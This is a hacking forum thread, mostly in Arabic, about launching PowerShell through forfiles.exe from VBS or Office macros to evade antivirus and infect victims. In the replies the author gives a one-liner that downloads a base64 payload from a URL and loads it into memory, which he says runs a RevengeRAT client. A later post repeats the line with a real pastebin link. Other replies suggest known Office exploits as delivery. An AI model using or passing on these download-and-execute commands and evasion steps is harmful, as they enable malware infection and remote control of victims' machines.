[ طريقة ] run Powershell as Child process of forfiles.exe [VBS and ms office Macro / AV bypass]

تم تحميل الصفحة في 0,4051119 ثانية
run Powershell as Child process of forfiles.exe [VBS and ms office Macro / AV bypass]
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
368
النقاط
63
الإقامة
JEDDAH City
سلام عليكم ورحمة الله وبركآته,

ملف أخر لتشغيل اوامر من مايكروسوفت يدعى forfiles.exe

رآح نستخدمه لتنفيذ بور شل اتاك ك شايلد بروسس وهذه مهمه لنجاح الاختراق بملفات الأوفس.

اختبرت الطريقة على الحمايات التآليه:


Avast , Bitdefender, and Windows defender


الشرح بيكون في بي اس كود وماكرو للأختراق بملفات الأوفس


أتركم مع الشرح : )

أتمنى تنسيق العنوان ممن لديه الصلاحيه في ذلك

 
إنضم
25 أكتوبر 2012
المشاركات
512
الإعجابات
550
النقاط
93
الإقامة
Palestine
يعطيك الف عافيه اخي لكن عندي سؤال ماهو الرابط الي تضعه بعد string هل يكون كود ملف exe ؟ كيف اقدر استخرج قيم ملفي ال exe كي هذا ؟ وكل الاحترام لك
 

Noctis

Active DeveloPer
rankrankrankrank
إنضم
16 مايو 2012
المشاركات
1,487
الإعجابات
1,150
النقاط
113
الإقامة
Morocco
أتمنى عوض الماكرو ان تنتقل الى تطبيقات على cve-2017-11882 او cve-2018-0802 فهي ثغرات تلقائية للأوفيس
وشكرا على مجهودك و ابداعاتك
 
إنضم
7 يوليو 2016
المشاركات
255
الإعجابات
368
النقاط
63
الإقامة
JEDDAH City
تحياتي لك اخي اسلوبك في الشرح رائع شكرا
شكرا لك.. شرفني مرورك

يعطيك الف عافيه اخي لكن عندي سؤال ماهو الرابط الي تضعه بعد string هل يكون كود ملف exe ؟ كيف اقدر استخرج قيم ملفي ال exe كي هذا ؟ وكل الاحترام لك
الرابط تبعي يحتوي نقطة ادخال لتشغيل بايتات كلاينت ريفنج رات بالذاكره...

طبعا مع شوية تمويهات....

حولت سترنق نقطة الادخال الى بيس 64 واثناء التشغيل اقوم بفكها عن طريق البور شل ثم تشغيل الكود ب استخدام invoke expression OR iex


كود:
[AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('Base64 Link'))).EntryPoint.invoke($null,$null)

أتمنى عوض الماكرو ان تنتقل الى تطبيقات على cve-2017-11882 او cve-2018-0802 فهي ثغرات تلقائية للأوفيس
وشكرا على مجهودك و ابداعاتك
راح اخذلي طلة ونشوف ايش يصير معايا.
 

d0rian

Beginner Developer
إنضم
11 ديسمبر 2018
المشاركات
1
الإعجابات
0
النقاط
1
العمر
35
Hola mis amigos, entregados a todos, tengo una pregunta:
Porque cuando ejecutas el icono en powershell:
[AppDomain] :: CurrentDomain.Load ([Convert] :: Frombase64String ((New-Object System.Net.WebClient) .downloadstring ('https://pastebin.com/raw/HGhuPNyL')) )EntryPoint.invoke ( $ Nulo, $ nulo)
Funciona perfectamente, pero cuando lo agrega a la oficina, ¿no funciona?

Prueba esto en la oficina
forfiles / c "Powershell Start process calc; Sleep -s 10000"
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل